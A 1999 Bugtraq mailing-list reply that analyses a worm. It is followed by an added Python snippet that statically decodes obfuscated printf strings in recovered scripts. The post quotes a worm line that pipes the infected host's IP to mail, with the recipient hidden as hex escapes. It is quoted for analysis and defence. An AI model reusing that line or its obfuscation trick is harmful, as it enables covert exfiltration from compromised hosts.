Bugtraq mailing list archives
Re: MW
From: adam () XPERT COM (Adam Morrison)
Date: Tue, 7 Sep 1999 17:23:25 +0200
On Wed, 1 Sep 1999, Christian Koderer wrote:

> ./IP | mail `printf "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> logout
> _EOF_
>
> In case no one bothered figuring this one out, this translates to 'beurp () hotmail com'
>
> Apparently './IP' is a program it runs to figure out which IP it should get the worm files from. Did you find a similarly named file?

It's a worm; it gets the worm files from the last infected machine. `IP' returns the address of the machine that the copy of the worm is running on, and is used in the `cmd' grappling hook which apparently gets executed on compromised remote hosts. Each time the worm infects a machine, it mails the IP address of that machine to <beurp () hotmail com>. Now, not to make any unfounded allegations, but this worm looks remarkably like ADMw0rm. I wonder why it restarts named when first infecting a host, when it appears to also utilize several other vulnerabilities in order to get in. Ho, hum.
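
When triaging a recovered script like the fragment quoted in this thread, the escaped `printf` argument can be decoded statically instead of running the script. The following is an added example, not part of the original post and not the worm's own code; the function names and the `min_escapes` threshold are assumptions, and the sample input is the quoted fragment embedded inline.

```python
import re

# Constructed sample: the fragment quoted in the thread, as it might appear
# in a script recovered from an infected host.
SAMPLE = r'''./IP | mail `printf "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
logout
_EOF_
'''

# A quoted string argument to printf (single or double quotes).
PRINTF_ARG = re.compile(r'''printf\s+(["'])((?:\\.|(?!\1).)*)\1''')
# \xHH, \ooo, or any other backslash escape.
ESCAPE = re.compile(r'\\x([0-9a-fA-F]{1,2})|\\([0-7]{1,3})|\\(.)')
NUMERIC = re.compile(r'\\x[0-9a-fA-F]{1,2}|\\[0-7]{1,3}')
SIMPLE = {'n': '\n', 't': '\t', 'r': '\r', '\\': '\\', '"': '"', "'": "'"}


def decode_printf_string(raw):
    """Decode printf-style escapes without invoking a shell."""
    def sub(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 8) & 0xFF)
        return SIMPLE.get(m.group(3), m.group(0))
    return ESCAPE.sub(sub, raw)


def find_obfuscated_strings(script, min_escapes=4):
    """Report printf arguments built mostly from numeric escapes.

    min_escapes is an assumed threshold that skips ordinary format
    strings such as "hello\\n".
    """
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        for m in PRINTF_ARG.finditer(line):
            raw = m.group(2)
            if len(NUMERIC.findall(raw)) >= min_escapes:
                findings.append({
                    'line': lineno,
                    'decoded': decode_printf_string(raw),
                    # The decoded value is used as a mail recipient.
                    'piped_to_mail': bool(re.search(r'\|\s*mail\b', line)),
                })
    return findings


if __name__ == '__main__':
    for finding in find_obfuscated_strings(SAMPLE):
        print(finding)
```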